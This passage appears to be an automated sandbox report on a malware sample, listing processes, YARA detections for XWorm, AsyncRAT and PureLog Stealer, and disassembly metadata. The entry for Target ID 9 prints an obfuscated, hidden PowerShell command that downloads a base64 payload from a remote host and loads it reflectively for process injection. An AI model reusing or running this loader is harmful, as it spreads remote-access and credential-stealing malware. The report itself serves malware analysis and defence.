                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:8
                                            Start time:09:26:18
                                            Start date:25/09/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff70f010000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:false

                                            General

                                            Target ID:9
                                            Start time:09:26:19
                                            Start date:25/09/2024
                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex"
                                            Imagebase:0x7ff760310000
                                            File size:452'608 bytes
                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000009.00000002.1736234279.000001697BE10000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000009.00000002.1675423746.000001690060E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000009.00000002.1675423746.000001690060E000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000009.00000002.1704495175.000001691061B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:10
                                            Start time:09:26:33
                                            Start date:25/09/2024
                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                                            Imagebase:0xcc0000
                                            File size:108'664 bytes
                                            MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000A.00000002.2644095929.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000A.00000002.2644095929.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000A.00000002.2650769165.0000000003531000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:high
                                            Has exited:false

                                            Disassembly

                                            Reset < >

                                              Executed Functions

                                              Function 00007FF886D124ED Relevance: .5, Instructions: 454COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.1517613572.00007FF886D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D10000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_7ff886d10000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 213b22e554cf7574cacb870ce6199bf3dfb78972673f224422c7aa137dc2bc0d
                                              • Instruction ID: 4d461937827c83d12fca1c07d93f94f0b9e82385ff040ec3667cc0b08adc39d3
                                              • Opcode Fuzzy Hash: 213b22e554cf7574cacb870ce6199bf3dfb78972673f224422c7aa137dc2bc0d
                                              • Instruction Fuzzy Hash: 31E13931D1DA8A8FE7969B6858561B5BBE0FF163A0B0801BFD04EC70D3E95A9C45C391
                                              Function 00007FF886D12536 Relevance: .3, Instructions: 291COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.1517613572.00007FF886D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D10000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_7ff886d10000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 648093aedc4d511e13b60ec21bd4b735fab14862b1d888abbb4ed02b8141924b
                                              • Instruction ID: 70e3f4d5cd148df179e27de184b7361b800080e7530cdc87f5d93d9fb688f82c
                                              • Opcode Fuzzy Hash: 648093aedc4d511e13b60ec21bd4b735fab14862b1d888abbb4ed02b8141924b
                                              • Instruction Fuzzy Hash: DDA1D221D1E7C68FE79697684866175BFE1FF162A0B0900FAC04ECB1D3E99E9C85C391
                                              Function 00007FF886C44CE5 Relevance: .0, Instructions: 49COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.1517401934.00007FF886C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886C40000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_7ff886c40000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                              • Instruction ID: 2659b444018f64f34980b13c9819558fb91d94c4d604cbe82098e2664f36eaf1
                                              • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                              • Instruction Fuzzy Hash: 3201677115CB0C8FD744EF4CE451AA5B7E0FB95364F10056DE58AC3691D636E882CB46

                                              Non-executed Functions

                                              Function 00007FF886D13292 Relevance: .6, Instructions: 558COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.1517613572.00007FF886D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D10000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_7ff886d10000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1a976a488f4653df68db2e2be67c1e24320d07c8c33651907d03e2105aada1f4
                                              • Instruction ID: d0e8ec86603e8de23eae46dc6e57a4e315bfb961cb22854d9ec9e78560f21b80
                                              • Opcode Fuzzy Hash: 1a976a488f4653df68db2e2be67c1e24320d07c8c33651907d03e2105aada1f4
                                              • Instruction Fuzzy Hash: 2BE14733E0DA894FE7969B2C58456B5BBE1FF56260B0901BBD04EC7193ED5AEC06C381

                                              Executed Functions

                                              Function 00007FF887A237B5 Relevance: .0, Instructions: 49COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1769289875.00007FF887A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887A20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_7ff887a20000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                              • Instruction ID: e0dae8d8a2b96ecac4e4daaecb5be9a990416f0fe4b58ab8f6495b75d71b3e7c
                                              • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                              • Instruction Fuzzy Hash: 6501A77011CB0C4FDB44EF0CE051AA6B3E0FB85360F10052DE58AC3661D636E882CB42

                                              Executed Functions

                                              Function 00007FF887AF03D4 Relevance: 4.0, Strings: 3, Instructions: 260COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1741293827.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_7ff887af0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: H$r6f$r6f
                                              • API String ID: 0-3128189231
                                              • Opcode ID: c0145149506d09a9223dd557cc90b813037c24031df19850fe772feed5d6b47f
                                              • Instruction ID: d7d7848fdbc31090f8eaa7630b96a6dafe3615856e570e83922acaadf621eadc
                                              • Opcode Fuzzy Hash: c0145149506d09a9223dd557cc90b813037c24031df19850fe772feed5d6b47f
                                              • Instruction Fuzzy Hash: 46712732E4CA4E4FE7A5DA6C58966BA77E1FF54390B4841BAC41DC7193EE28EC05C341
                                              Function 00007FF887AF6A01 Relevance: 2.9, Strings: 2, Instructions: 370COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1741293827.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_7ff887af0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 8!K$K_L;
                                              • API String ID: 0-3718000886
                                              • Opcode ID: 4fb86d3f598622d6ca726545b5050af41ce6f50f7d110aff516f8afd3ce1ad3c
                                              • Instruction ID: d9244a027ed13b0dbc4d2c9174c64401fc0ebb88b3c5c76d1d31843868eea072
                                              • Opcode Fuzzy Hash: 4fb86d3f598622d6ca726545b5050af41ce6f50f7d110aff516f8afd3ce1ad3c
                                              • Instruction Fuzzy Hash: A1B11822E8EACA0FE7969A6818262B97BF5FF57395B1811BEC04DC71D3DD189C06C341
                                              Function 00007FF887AF6AEA Relevance: 1.4, Strings: 1, Instructions: 143COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1741293827.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_7ff887af0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: K_L;
                                              • API String ID: 0-3883303040
                                              • Opcode ID: d12db9f1cb555762202471ca0bc001bb2af79906ee8ebfdd38c70b5156018aa7
                                              • Instruction ID: 8de65235cf5953960a00ac86e2fab5db528fa0ba510d380d6ff4c6b706d70eeb
                                              • Opcode Fuzzy Hash: d12db9f1cb555762202471ca0bc001bb2af79906ee8ebfdd38c70b5156018aa7
                                              • Instruction Fuzzy Hash: 1C41E322ECEACB1BF6A59A2804632BD66E6FF567A5B5810BDC44DC71D3DD1CAC05C301
                                              Function 00007FF887A23F35 Relevance: .0, Instructions: 49COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1740752525.00007FF887A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887A20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_7ff887a20000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f95288c4a99142d14386fe92749649a4d709b0a47b1d07265438fae586fa589f
                                              • Instruction ID: 4f0d268a18c14df97d161705c2af311f7da37067c9cae93d0511756bb1793cc5
                                              • Opcode Fuzzy Hash: f95288c4a99142d14386fe92749649a4d709b0a47b1d07265438fae586fa589f
                                              • Instruction Fuzzy Hash: 9C01677115CB0C4FDB44EF0CE451AA5B7E0FB95364F10056DE58AC3655DB36E882CB46

                                              Non-executed Functions

                                              Function 00007FF887A286A9 Relevance: .1, Instructions: 146COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1740752525.00007FF887A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887A20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_7ff887a20000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d3a7755eb9b1ad1d4405bf178a28d0654ad93b236a2d712603d0446a0ec596ef
                                              • Instruction ID: a878d1e06ae413875e9ad2bc3250f0871527255e49723375b313a6b2fdc11400
                                              • Opcode Fuzzy Hash: d3a7755eb9b1ad1d4405bf178a28d0654ad93b236a2d712603d0446a0ec596ef
                                              • Instruction Fuzzy Hash: D051326288E7C14FE7039B708C626947FB0AF03264B4E05EBD4D4CF4E3E6585A5AC722
                                              Function 00007FF887A28BFA Relevance: 6.3, Strings: 5, Instructions: 96COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1740752525.00007FF887A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887A20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_7ff887a20000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: M_^$M_^$M_^$M_^$M_^
                                              • API String ID: 0-3725639274
                                              • Opcode ID: abc3cb69a53d816e21a9e9ce492c85bf947a4e7b0e51566b0c47b307f7c18f05
                                              • Instruction ID: f8023892eb7173e4434a29b3ed8591be8a903f0c0e8412ab582e47f7437f89d6
                                              • Opcode Fuzzy Hash: abc3cb69a53d816e21a9e9ce492c85bf947a4e7b0e51566b0c47b307f7c18f05
                                              • Instruction Fuzzy Hash: 8C31B26261DAC69FC316973D9C988D97F90BF6216874E03F6D0B88B1D3FA086406C296

                                              Execution Graph

                                              Execution Coverage:13.5%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:0%
                                              Total number of Nodes:52
                                              Total number of Limit Nodes:6
                                              execution_graph 11941 16118e0 11942 16118e4 11941->11942 11945 1611ce0 11942->11945 11950 1611bc9 11942->11950 11946 1611cb7 11945->11946 11947 1611cde 11946->11947 11955 1612168 11946->11955 11960 1612178 11946->11960 11947->11942 11952 1611bd0 11950->11952 11951 1611cde 11951->11942 11952->11951 11953 1612168 3 API calls 11952->11953 11954 1612178 3 API calls 11952->11954 11953->11952 11954->11952 11956 1612178 11955->11956 11965 1612bc8 11956->11965 11970 1612d6b 11956->11970 11957 161227e 11957->11957 11961 161219d 11960->11961 11963 1612bc8 3 API calls 11961->11963 11964 1612d6b 3 API calls 11961->11964 11962 161227e 11962->11962 11963->11962 11964->11962 11966 1612bcd 11965->11966 11967 1612d5e 11966->11967 11975 16179e0 11966->11975 11979 16179f0 11966->11979 11967->11957 11971 1612d6e 11970->11971 11972 1613062 11971->11972 11973 16179e0 3 API calls 11971->11973 11974 16179f0 3 API calls 11971->11974 11972->11957 11973->11972 11974->11972 11976 1617a15 11975->11976 11983 1617c80 11976->11983 11977 1617a77 11977->11967 11980 1617a15 11979->11980 11982 1617c80 3 API calls 11980->11982 11981 1617a77 11981->11967 11982->11981 11987 16180c8 11983->11987 11995 16180ba 11983->11995 11984 1617c9e 11984->11977 11988 16180d5 11987->11988 11989 16180fd 11987->11989 11988->11984 12003 1617cb8 11989->12003 11991 161811e 11991->11984 11993 16181e6 GlobalMemoryStatusEx 11994 1618216 11993->11994 11994->11984 11996 16180d5 11995->11996 11997 16180fd 11995->11997 11996->11984 11998 1617cb8 GlobalMemoryStatusEx 11997->11998 12000 161811a 11998->12000 11999 161811e 11999->11984 12000->11999 12001 16181e6 GlobalMemoryStatusEx 12000->12001 12002 1618216 12001->12002 12002->11984 12004 16181a0 GlobalMemoryStatusEx 12003->12004 12006 161811a 12004->12006 12006->11991 12006->11993

                                              Executed Functions

                                              Function 016180C8 Relevance: 1.6, APIs: 1, Instructions: 130COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2647689257.0000000001610000.00000040.00000800.00020000.00000000.sdmp, Offset: 01610000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_1610000_CasPol.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d4cfdd6cdb36cf046272d2ec05271fdcbcaba02e21c9f9d5824a5d21cb147590
                                              • Instruction ID: db3e6a842058390aaa7b5fd13c2602d1ee1784887bb4bc170548d77cbbf8d284
                                              • Opcode Fuzzy Hash: d4cfdd6cdb36cf046272d2ec05271fdcbcaba02e21c9f9d5824a5d21cb147590
                                              • Instruction Fuzzy Hash: 13412332D047568FDB15DFB9D8407DABBF5EF8A210F18856AD404A7341EB789845CBE0
                                              Function 01617CB8 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 25 1617cb8-1618214 GlobalMemoryStatusEx 29 1618216-161821c 25->29 30 161821d-1618245 25->30 29->30
                                              APIs
                                              • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,0161811A), ref: 01618207
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2647689257.0000000001610000.00000040.00000800.00020000.00000000.sdmp, Offset: 01610000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_1610000_CasPol.jbxd
                                              Similarity
                                              • API ID: GlobalMemoryStatus
                                              • String ID:
                                              • API String ID: 1890195054-0
                                              • Opcode ID: 2e126b53d7c065bfd2c72afe485777a38a972780311a1204eb13d724c9ea6863
                                              • Instruction ID: cbad4f7c651d3c07700f81320d849239821cee544dac8f700fc5e0c8dd0b0af7
                                              • Opcode Fuzzy Hash: 2e126b53d7c065bfd2c72afe485777a38a972780311a1204eb13d724c9ea6863
                                              • Instruction Fuzzy Hash: B41103B2C0065A9FDB10DF9AC844BDEFBF4EF48210F14816AE818A7240D378A954CFE5
                                              Function 01618198 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 33 1618198-161819c 34 16181a9-16181de 33->34 35 161819e-16181a6 33->35 36 16181e6-1618214 GlobalMemoryStatusEx 34->36 35->34 37 1618216-161821c 36->37 38 161821d-1618245 36->38 37->38
                                              APIs
                                              • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,0161811A), ref: 01618207
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2647689257.0000000001610000.00000040.00000800.00020000.00000000.sdmp, Offset: 01610000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_1610000_CasPol.jbxd
                                              Similarity
                                              • API ID: GlobalMemoryStatus
                                              • String ID:
                                              • API String ID: 1890195054-0
                                              • Opcode ID: 10450ad4ed74bc0e8e7caa8fe10891445a126fddd6bde9c0cb66a69285c3660a
                                              • Instruction ID: 8d95ebb4d901ce2f2167696c71a11b837e5d8218f2aa8d680a93b6156208ece9
                                              • Opcode Fuzzy Hash: 10450ad4ed74bc0e8e7caa8fe10891445a126fddd6bde9c0cb66a69285c3660a
                                              • Instruction Fuzzy Hash: 8A1112B6C0065ACFDB10CF9AD9447DEFBB4AF48210F29816AD418A7340D378A945CFE1